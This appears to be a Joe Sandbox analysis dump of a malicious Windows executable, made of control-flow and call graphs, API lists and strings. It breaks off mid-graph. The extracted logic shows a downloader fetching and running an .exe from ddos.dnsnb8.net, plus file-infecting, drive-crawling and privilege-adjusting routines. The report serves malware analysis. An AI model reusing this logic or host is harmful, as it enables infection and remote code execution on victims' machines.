429->436 431->420 440 44a552 431->440 432->431 450 44a52a-44a53f call 444570 432->450 437 44a643-44a66e call 442500 436->437 438 44a6f9-44a701 436->438 451 44a670 437->451 452 44a678-44a67b 437->452 438->436 447 44a707 438->447 440->414 441->412 441->421 442->441 447->430 450->431 461 44a554 450->461 454 44a6a7-44a6b4 451->454 455 44a672-44a674 451->455 457 44a67d-44a680 452->457 458 44a689-44a696 452->458 465 44a6d2-44a6d3 call 449ef0 454->465 459 44a676 455->459 460 44a698-44a6a5 455->460 462 44a6b6-44a6c3 call 44bb00 457->462 463 44a682-44a687 457->463 464 44a6db-44a6ef 458->464 459->458 460->465 461->414 470 44a6d8 462->470 463->458 468 44a6c5-44a6cc 463->468 464->438 467 44a6f1-44a6f7 464->467 465->470 467->438 471 44a709-44a711 467->471 468->465 470->464 471->430
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID: HLSERVER*
                            • API String ID: 0-957054744
                            • Opcode ID: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
                            • Instruction ID: 414a6989aa7181aa4c89ac1ab9b235a0e7efefaa3f73ce74a9a2122661ee6fb3
                            • Opcode Fuzzy Hash: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
                            • Instruction Fuzzy Hash: 4DC1C171984301ABF720DF20DD41B6BB3E4BB84708F14482EF9899B281E779D955CB9B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 542 446d40-446d59 call 4453d0 545 446d6b-446dbb call 4424e0 * 2 call 442530 542->545 546 446d5b-446d6a 542->546 554 446dcd-446de7 call 442530 545->554 555 446dbd-446dcc 545->555 558 446e00-446e27 call 44be20 554->558 559 446de9-446dff LocalFree 554->559 564 446e2f-446e4c Sleep 558->564 565 446e53-446e9a 564->565 567 446e9c 565->567 568 446e9e-446ea0 565->568 567->568 569 446ea6-446ec7 568->569 570 446f3e-446f42 568->570 575 446ed5 569->575 576 446ec9-446ed3 569->576 570->564 571 446f48-446f4d 570->571 573 446f5e 571->573 574 446f4f-446f5c LocalFree 571->574 577 446f64-446f66 573->577 574->577 578 446ed7-446ed9 575->578 576->575 576->578 579 446f68-446f69 LocalFree 577->579 580 446f6b-446f75 577->580 578->570 581 446edb-446ee3 578->581 579->580 582 446ee5-446eea 581->582 583 446f36-446f38 581->583 584 446eee-446efa 582->584 583->565 583->570 585 446f32-446f34 584->585 586 446efc-446f2f call 4424e0 call 442500 call 446f80 584->586 585->583 585->584 586->585
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
                            • Instruction ID: 6ef43b866e82f3513f8c0b0e81522870bcf4ae598b1323f2f16c687a8000aed2
                            • Opcode Fuzzy Hash: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
                            • Instruction Fuzzy Hash: CD51E5B16403016BF720AF50EC45BAB73A4EF81715F40042EFA45962C1EBBDD9198B9A

                            Execution Graph

                            Execution Coverage:28.6%
                            Dynamic/Decrypted Code Coverage:10.4%
                            Signature Coverage:18.9%
                            Total number of Nodes:297
                            Total number of Limit Nodes:11
                            execution_graph 1017 c014e1 1018 c01541 1017->1018 1019 c014fd GetModuleHandleA 1017->1019 1021 c01573 1018->1021 1025 c01549 1018->1025 1020 c0151a VirtualQuery 1019->1020 1023 c01512 1019->1023 1020->1023 1028 c01638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1021->1028 1023->1018 1024 c01566 1025->1024 1045 c01af9 1025->1045 1026 c01579 ExitProcess 1029 c0167a 1028->1029 1030 c0167f 1028->1030 1063 c0139f GetVersionExA 1029->1063 1051 c01718 GetSystemTimeAsFileTime 1030->1051 1033 c01686 1034 c016ca 1033->1034 1037 c016a0 CreateThread 1033->1037 1035 c016d0 1034->1035 1036 c016d7 1034->1036 1084 c01581 1035->1084 1039 c016dd lstrcpy 1036->1039 1040 c0170f 1036->1040 1056 c02c48 memset 1037->1056 1300 c01099 1037->1300 1039->1026 1040->1026 1044 c01718 3 API calls 1044->1034 1046 c01b11 1045->1046 1047 c01b09 1045->1047 1049 c01b16 CreateThread 1046->1049 1050 c01b0f 1046->1050 1048 c01638 188 API calls 1047->1048 1048->1050 1049->1050 1319 c01638 189 API calls 1049->1319 1050->1024 1050->1050 1052 c01754 1051->1052 1053 c01735 SHSetValueA 1051->1053 1054 c0175a SHGetValueA 1052->1054 1055 c01786 __aulldiv 1052->1055 1053->1055 1054->1055 1055->1033 1090 c01973 PathFileExistsA 1056->1090 1059 c02cb2 1061 c016ba WaitForSingleObject 1059->1061 1062 c02cbb VirtualFree 1059->1062 1060 c02c8f CreateThread WaitForMultipleObjects 1060->1059 1112 c02b8c memset GetLogicalDriveStringsA 1060->1112 1061->1044 1062->1061 1064 c014da 1063->1064 1065 c013cf LookupPrivilegeValueA 1063->1065 1064->1030 1066 c013e7 1065->1066 1068 c013ef 1065->1068 1280 c0119f GetCurrentProcess OpenProcessToken 1066->1280 1068->1064 1285 c0120e GetModuleHandleA GetProcAddress 1068->1285 1073 c01448 GetCurrentProcessId 1073->1064 1074 c01457 1073->1074 1074->1064 1075 c01319 3 API calls 1074->1075 1076 c0147f 1075->1076 1077 c01319 3 API calls 1076->1077 1078 c0148e 1077->1078 1078->1064 1079 c01319 3 API calls 1078->1079 1080 c014b4 1079->1080 1081 c01319 3 API calls 1080->1081 1082 c014c3 1081->1082 1083 c01319 3 API calls 1082->1083 1083->1064 1299 c0185b GetSystemTimeAsFileTime srand rand srand rand 1084->1299 1086 c01592 wsprintfA wsprintfA lstrlen CreateFileA 1087 c01633 1086->1087 1088 c015fb WriteFile CloseHandle 1086->1088 1087->1040 1088->1087 1089 c0161d ShellExecuteA 1088->1089 1089->1087 1091 c019a0 1090->1091 1092 c01ac7 1090->1092 1093 c019af CreateFileA 1091->1093 1092->1059 1092->1060 1094 c019c4 Sleep 1093->1094 1095 c01a28 GetFileSize 1093->1095 1094->1093 1097 c019d5 1094->1097 1096 c01a38 1095->1096 1104 c01a80 1095->1104 1098 c01a3d VirtualAlloc 1096->1098 1096->1104 1111 c0185b GetSystemTimeAsFileTime srand rand srand rand 1097->1111 1098->1104 1108 c01a53 1098->1108 1099 c01a96 1102 c01aad 1099->1102 1110 c01a9c DeleteFileA 1099->1110 1100 c01a8d FindCloseChangeNotification 1100->1099 1102->1092 1109 c01ab8 VirtualFree 1102->1109 1103 c019da wsprintfA CopyFileA 1103->1095 1107 c01a0d CreateFileA 1103->1107 1104->1099 1104->1100 1105 c01a59 ReadFile 1105->1104 1105->1108 1107->1095 1107->1110 1108->1104 1108->1105 1109->1092 1110->1102 1111->1103 1113 c02c09 WaitForMultipleObjects 1112->1113 1118 c02bc8 1112->1118 1114 c02c2a CreateThread 1113->1114 1115 c02c3c 1113->1115 1114->1115 1123 c02845 1114->1123 1116 c02bfa lstrlen 1116->1113 1116->1118 1117 c02bd2 GetDriveTypeA 1117->1116 1117->1118 1118->1116 1118->1117 1119 c02be3 CreateThread 1118->1119 1119->1116 1120 c02b7d 1119->1120 1133 c029e2 memset wsprintfA 1120->1133 1270 c0274a memset memset SHGetSpecialFolderPathA wsprintfA 1123->1270 1125 c02878 DeleteFileA 1126 c0289a 1125->1126 1127 c0288c VirtualFree 1125->1127 1129 c028a4 CloseHandle 1126->1129 1130 c028ab 1126->1130 1127->1126 1128 c02692 8 API calls 1131 c02853 1128->1131 1129->1130 1131->1125 1131->1128 1132 c0239d 186 API calls 1131->1132 1132->1131 1134 c02a3a memset lstrlen lstrcpyn strrchr 1133->1134 1135 c02abc memset memset FindFirstFileA 1133->1135 1134->1135 1137 c02a88 1134->1137 1147 c028b8 memset wsprintfA 1135->1147 1137->1135 1138 c02a9a lstrcmpiA 1137->1138 1140 c02b74 1138->1140 1141 c02aad lstrlen 1138->1141 1141->1135 1141->1138 1142 c02b61 FindNextFileA 1143 c02b23 1142->1143 1144 c02b6d FindClose 1142->1144 1145 c02b35 lstrcmpiA 1143->1145 1146 c028b8 174 API calls 1143->1146 1144->1140 1145->1143 1145->1144 1146->1142 1148 c02905 1147->1148 1156 c02951 memset 1147->1156 1149 c02956 strrchr 1148->1149 1150 c0291b memset wsprintfA 1148->1150 1148->1156 1152 c02967 lstrcmpiA 1149->1152 1149->1156 1151 c029e2 180 API calls 1150->1151 1151->1156 1153 c02988 lstrcmpiA 1152->1153 1154 c0297a 1152->1154 1153->1156 1158 c02994 1153->1158 1165 c01e6e 1154->1165 1156->1142 1157 c029ad strstr 1159 c029d3 1157->1159 1160 c029cb 1157->1160 1158->1157 1161 c029a5 lstrcpy 1158->1161 1230 c02692 1159->1230 1208 c0239d strstr 1160->1208 1161->1157 1166 c01e7d 1165->1166 1239 c01df6 strrchr 1166->1239 1169 c01eb0 SetFileAttributesA CreateFileA 1170 c02332 1169->1170 1171 c01edf 1169->1171 1172 c02346 1170->1172 1173 c0233d UnmapViewOfFile 1170->1173 1244 c01915 1171->1244 1176 c02350 1172->1176 1177 c0234b FindCloseChangeNotification 1172->1177 1173->1172 1178 c02391 1176->1178 1179 c02356 CloseHandle 1176->1179 1177->1176 1178->1156 1179->1178 1180 c01f2e 1180->1170 1250 c01c81 1180->1250 1184 c01f92 1185 c01c81 2 API calls 1184->1185 1186 c01f9f 1185->1186 1186->1170 1187 c01af9 169 API calls 1186->1187 1189 c02024 1186->1189 1191 c01fc0 1187->1191 1188 c01af9 169 API calls 1190 c0207a 1188->1190 1189->1170 1189->1188 1192 c01af9 169 API calls 1190->1192 1191->1170 1191->1189 1193 c01af9 169 API calls 1191->1193 1196 c02090 1192->1196 1194 c01ffe 1193->1194 1195 c02013 FlushViewOfFile 1194->1195 1195->1189 1197 c020bb memset memset 1196->1197 1198 c020f5 1197->1198 1199 c01c81 2 API calls 1198->1199 1200 c021de 1199->1200 1201 c02226 memcpy UnmapViewOfFile CloseHandle 1200->1201 1255 c01b8a 1201->1255 1203 c0226e 1263 c0185b GetSystemTimeAsFileTime srand rand srand rand 1203->1263 1205 c022ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1206 c01915 3 API calls 1205->1206 1207 c0231f FindCloseChangeNotification 1206->1207 1207->1170 1209 c02451 CreateFileA GetFileSize 1208->1209 1216 c023d8 1208->1216 1210 c02480 1209->1210 1211 c02675 CloseHandle 1209->1211 1210->1211 1213 c02499 1210->1213 1212 c0267c RemoveDirectoryA 1211->1212 1214 c02687 1212->1214 1215 c01915 3 API calls 1213->1215 1214->1156 1217 c024a4 9 API calls 1215->1217 1216->1209 1216->1214 1265 c0189d memset CreateProcessA 1217->1265 1220 c0255c Sleep memset wsprintfA 1221 c029e2 163 API calls 1220->1221 1222 c02597 memset wsprintfA Sleep 1221->1222 1223 c0189d 6 API calls 1222->1223 1224 c025e4 Sleep CreateFileA 1223->1224 1225 c01915 3 API calls 1224->1225 1226 c02610 CloseHandle 1225->1226 1226->1212 1227 c0261e 1226->1227 1227->1212 1228 c02641 SetFilePointer WriteFile 1227->1228 1228->1212 1229 c02667 SetEndOfFile 1228->1229 1229->1212 1231 c026b2 WaitForSingleObject 1230->1231 1232 c026a2 CreateEventA 1230->1232 1233 c026c1 lstrlen ??2@YAPAXI 1231->1233 1234 c02708 1231->1234 1232->1231 1235 c02736 SetEvent 1233->1235 1236 c026da lstrcpy 1233->1236 1234->1235 1237 c02718 lstrcpy ??3@YAXPAX 1234->1237 1235->1156 1238 c026f1 1236->1238 1237->1238 1238->1235 1240 c01e62 1239->1240 1241 c01e13 lstrcpy strrchr 1239->1241 1240->1169 1240->1170 1241->1240 1242 c01e40 lstrcmpiA 1241->1242 1242->1240 1243 c01e52 lstrlen 1242->1243 1243->1240 1243->1242 1245 c01928 1244->1245 1246 c01924 SetFilePointer CreateFileMappingA MapViewOfFile 1244->1246 1247 c0192e memset GetFileTime 1245->1247 1248 c0194f 1245->1248 1246->1170 1246->1180 1247->1246 1248->1246 1249 c01954 SetFileTime 1248->1249 1249->1246 1251 c01c9c 1250->1251 1253 c01c94 1250->1253 1252 c01cae memset memset 1251->1252 1251->1253 1252->1253 1253->1170 1254 c0185b GetSystemTimeAsFileTime srand rand srand rand 1253->1254 1254->1184 1256 c01b93 1255->1256 1264 c0185b GetSystemTimeAsFileTime srand rand srand rand 1256->1264 1258 c01bca srand 1259 c01bd8 rand 1258->1259 1260 c01c08 1259->1260 1260->1259 1261 c01c29 memset memcpy lstrcat 1260->1261 1261->1203 1263->1205 1264->1258 1266 c018e0 CloseHandle WaitForSingleObject 1265->1266 1267 c0190c 1265->1267 1268 c01907 CloseHandle 1266->1268 1269 c018fb GetExitCodeProcess 1266->1269 1267->1212 1267->1220 1268->1267 1269->1268 1279 c0185b GetSystemTimeAsFileTime srand rand srand rand 1270->1279 1272 c027b5 wsprintfA CopyFileA 1273 c02840 1272->1273 1274 c027de wsprintfA 1272->1274 1273->1131 1275 c01973 17 API calls 1274->1275 1276 c0280f 1275->1276 1277 c02820 CreateFileA 1276->1277 1278 c02813 DeleteFileA 1276->1278 1277->1273 1278->1277 1279->1272 1281 c01200 CloseHandle 1280->1281 1282 c011c6 AdjustTokenPrivileges 1280->1282 1281->1068 1283 c011f6 1282->1283 1284 c011f7 CloseHandle 1282->1284 1283->1284 1284->1281 1286 c01310 1285->1286 1287 c0123f GetCurrentProcessId OpenProcess 1285->1287 1286->1064 1294 c01319 1286->1294 1287->1286 1291 c01262 1287->1291 1288 c012b0 VirtualAlloc 1288->1291 1293 c012b8 1288->1293 1289 c012f1 CloseHandle 1289->1286 1290 c01302 VirtualFree 1289->1290 1290->1286 1291->1288 1291->1289 1292 c01296 VirtualFree 1291->1292 1291->1293 1292->1288 1293->1289 1295 c0134a 1294->1295 1296 c0132a GetModuleHandleA GetProcAddress 1294->1296 1297 c01351 memset 1295->1297 1298 c01363 1295->1298 1296->1295 1296->1298 1297->1298 1298->1064 1298->1073 1299->1086 1301 c01196 1300->1301 1302 c010ba 1300->1302 1302->1301 1318 c0185b GetSystemTimeAsFileTime srand rand srand rand 1302->1318 1304 c01118 wsprintfA wsprintfA URLDownloadToFileA 1305 c01168 lstrlen Sleep 1304->1305 1306 c010dc 1304->1306 1305->1302 1309 c01000 CreateFileA 1306->1309 1310 c01092 WinExec lstrlen 1309->1310 1311 c01025 GetFileSize CreateFileMappingA MapViewOfFile 1309->1311 1310->1301 1310->1302 1312 c01057 1311->1312 1313 c0107b 1311->1313 1314 c01074 UnmapViewOfFile 1312->1314 1317 c01061 1312->1317 1315 c01087 CloseHandle 1313->1315 1316 c0108d CloseHandle 1313->1316 1314->1313 1315->1316 1316->1310 1317->1314 1318->1304 1334 c02361 1335 c02374 1334->1335 1336 c0236b UnmapViewOfFile 1334->1336 1337 c02382 1335->1337 1338 c02379 CloseHandle 1335->1338 1336->1335 1339 c02388 CloseHandle 1337->1339 1340 c02391 1337->1340 1338->1337 1339->1340 1341 c06014 1342 c0605f 1341->1342 1343 c06035 GetModuleHandleA 1341->1343 1344 c0604d GetProcAddress 1343->1344 1345 c06058 1344->1345 1345->1342 1345->1344 1345->1345 1320 c06076 1321 c0607b 1320->1321 1326 c060c7 1320->1326 1323 c060b0 VirtualAlloc 1321->1323 1321->1326 1331 c061b2 1321->1331 1322 c0615f VirtualFree 1322->1326 1323->1326 1324 c06198 VirtualFree 1324->1331 1325 c060d5 VirtualAlloc 1325->1326 1326->1322 1326->1324 1326->1325 1327 c06389 VirtualProtect 1330 c063b7 1327->1330 1328 c063fc VirtualProtect 1329 c06400 1328->1329 1330->1328 1332 c063e7 VirtualProtect 1330->1332 1331->1327 1333 c062fb 1331->1333 1332->1328 1332->1330 1346 c06159 VirtualFree 1354 c060c7 1346->1354 1347 c06198 VirtualFree 1356 c061b2 1347->1356 1348 c060d5 VirtualAlloc 1348->1354 1349 c06389 VirtualProtect 1353 c063b7 1349->1353 1350 c063fc VirtualProtect 1352 c06400 1350->1352 1351 c0615f VirtualFree 1351->1354 1353->1350 1355 c063e7 VirtualProtect 1353->1355 1354->1347 1354->1348 1354->1351 1355->1350 1355->1353 1356->1349 1357 c062fb 1356->1357

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00C02845 3 Function_00C0274A 0->3 36 Function_00C02692 0->36 44 Function_00C0239D 0->44 1 Function_00C02C48 17 Function_00C01973 1->17 33 Function_00C02B8C 1->33 2 Function_00C066C8 24 Function_00C06D00 2->24 28 Function_00C06B02 2->28 29 Function_00C06A84 2->29 6 Function_00C0185B 3->6 3->17 4 Function_00C017D0 5 Function_00C06159 5->2 7 Function_00C0235D 8 Function_00C02D60 9 Function_00C014E1 21 Function_00C01AF9 9->21 53 Function_00C01638 9->53 10 Function_00C02361 43 Function_00C02D9B 10->43 11 Function_00C029E2 54 Function_00C028B8 11->54 12 Function_00C06B63 48 Function_00C067A4 12->48 50 Function_00C069B0 12->50 51 Function_00C06834 12->51 13 Function_00C01C68 14 Function_00C01E6E 14->6 14->8 14->13 19 Function_00C01DF6 14->19 14->21 26 Function_00C01C81 14->26 30 Function_00C01D8A 14->30 31 Function_00C01B8A 14->31 39 Function_00C01915 14->39 14->43 15 Function_00C02CF0 16 Function_00C06CF2 20 Function_00C06CF8 16->20 17->6 18 Function_00C06076 18->2 21->53 22 Function_00C02B7D 22->11 23 Function_00C01000 23->4 24->12 24->16 24->50 25 Function_00C06001 32 Function_00C0600A 25->32 27 Function_00C01581 27->6 28->12 29->16 35 Function_00C0680F 29->35 31->6 33->0 33->22 34 Function_00C0120E 37 Function_00C06012 38 Function_00C06014 40 Function_00C01718 40->15 41 Function_00C01099 41->6 41->23 42 Function_00C01319 44->11 44->39 45 Function_00C0189D 44->45 46 Function_00C0119F 47 Function_00C0139F 47->34 47->42 47->46 49 Function_00C065A6 52 Function_00C06734 52->24 52->28 52->29 53->1 53->4 53->27 53->40 53->41 53->47 54->11 54->14 54->36 54->44

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                            • String ID: %s*$C:\$Documents and Settings
                            • API String ID: 2826467728-110786608
                            • Opcode ID: fd5684fcdc9253c6572a6e09028e9efc7dee96e3e2c9b539d66b4baa5d7f5b02
                            • Instruction ID: 7ede36e60cf10fab26fe90f1a2d0f6c3b455db66532f0a01967ad524f086ed40
                            • Opcode Fuzzy Hash: fd5684fcdc9253c6572a6e09028e9efc7dee96e3e2c9b539d66b4baa5d7f5b02
                            • Instruction Fuzzy Hash: 544173B2405389AFDB21DBA0DC8DEEF77ACEB84315F04092AF555C2191E634D748DBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 172 c01099-c010b4 173 c01199-c0119c 172->173 174 c010ba-c010c7 172->174 175 c010c8-c010d4 174->175 176 c01184-c01190 175->176 177 c010da 175->177 176->175 178 c01196-c01198 176->178 179 c01113-c01162 call c0185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 c01168-c01182 lstrlen Sleep 179->182 183 c010dc-c0110d call c01000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                            APIs
                              • Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894
                            • WinExec.KERNEL32(?,00000005), ref: 00C010F1
                            • lstrlen.KERNEL32(00C04748), ref: 00C010FA
                            • wsprintfA.USER32 ref: 00C0112A
                            • wsprintfA.USER32 ref: 00C01143
                            • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00C0115B
                            • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00C01169
                            • Sleep.KERNEL32 ref: 00C01179
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                            • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1280626985-3050893656
                            • Opcode ID: 536936953e306ca87d6f9292ff169038a9e1bc26cdfe34f0541c324c3689055c
                            • Instruction ID: 3a8bd3d51f8a3ed2e1c082ace53d6a4bbadb028be8dee776260d4bba38561720
                            • Opcode Fuzzy Hash: 536936953e306ca87d6f9292ff169038a9e1bc26cdfe34f0541c324c3689055c
                            • Instruction Fuzzy Hash: 092160B5901248BEDB24DBA0DC49FAFBBBCAB05319F1641A5EA01A3090D7749B84DF60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 c01718-c01733 GetSystemTimeAsFileTime 217 c01754-c01758 216->217 218 c01735-c01752 SHSetValueA 216->218 219 c017c6-c017cd 217->219 220 c0175a-c01784 SHGetValueA 217->220 218->219 220->219 221 c01786-c017b3 call c02cf0 * 2 220->221 221->219 226 c017b5 221->226 227 c017b7-c017bd 226->227 228 c017bf 226->228 227->219 227->228 228->219
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01729
                            • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00C0174C
                            • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00C0177C
                            • __aulldiv.LIBCMT ref: 00C01796
                            • __aulldiv.LIBCMT ref: 00C017A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: TimeValue__aulldiv$FileSystem
                            • String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$SOFTWARE\GTplus$Time
                            • API String ID: 541852442-2960472624
                            • Opcode ID: f6e254fca421d06ca14a1495f3be15384735301f179e3508c02b234a88b6a33c
                            • Instruction ID: dff56cbefd8a2dfb63639cd6ad99f93f9e81e45d79351a646fa577e234966e7a
                            • Opcode Fuzzy Hash: f6e254fca421d06ca14a1495f3be15384735301f179e3508c02b234a88b6a33c
                            • Instruction Fuzzy Hash: 32114675A00259BBEB109B94CC89FEFBBBCEB44B14F118125FE11B61C1D6759B44CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 229 c06076-c06079 230 c060e0-c060eb 229->230 231 c0607b-c06080 229->231 232 c060ee-c060f4 230->232 233 c06082-c06085 231->233 234 c060f7-c060f8 231->234 235 c060f6 232->235 233->235 238 c06087 233->238 236 c060fa-c060fc call c066c8 234->236 237 c060fe-c06106 234->237 235->234 236->237 240 c06155-c06189 VirtualFree 237->240 241 c06108-c0611d 237->241 238->232 242 c06089-c06095 238->242 247 c0618c-c06192 240->247 244 c0611f-c06121 241->244 245 c060a1-c060aa 242->245 246 c06097-c0609f 242->246 248 c06151-c06154 244->248 249 c06123 244->249 250 c060b0-c060c1 VirtualAlloc 245->250 251 c061ba-c061c8 245->251 246->245 252 c060c7-c060cf 247->252 253 c06198-c061b0 VirtualFree 247->253 248->240 249->248 256 c06125-c06128 249->256 250->252 254 c06243-c06251 251->254 255 c061ca-c061d7 251->255 252->247 257 c060d5-c060df VirtualAlloc 252->257 253->251 260 c061b2-c061b4 253->260 258 c06253 254->258 259 c06264-c0626f 254->259 261 c061dd-c061e0 255->261 262 c06134-c0613b 256->262 263 c0612a-c0612e 256->263 257->230 265 c06255-c06258 258->265 266 c06271-c06276 259->266 260->251 261->254 267 c061e2-c061f2 261->267 269 c06130-c06132 262->269 270 c0613d-c0614f 262->270 263->262 263->269 265->259 271 c0625a-c06262 265->271 272 c06389-c063b1 VirtualProtect 266->272 273 c0627c-c06289 266->273 274 c061f5-c061fe 267->274 269->244 270->244 271->265 275 c063b7-c063ba 272->275 287 c06292-c06298 273->287 288 c0628b 273->288 276 c06200-c06203 274->276 277 c0620c-c06219 274->277 278 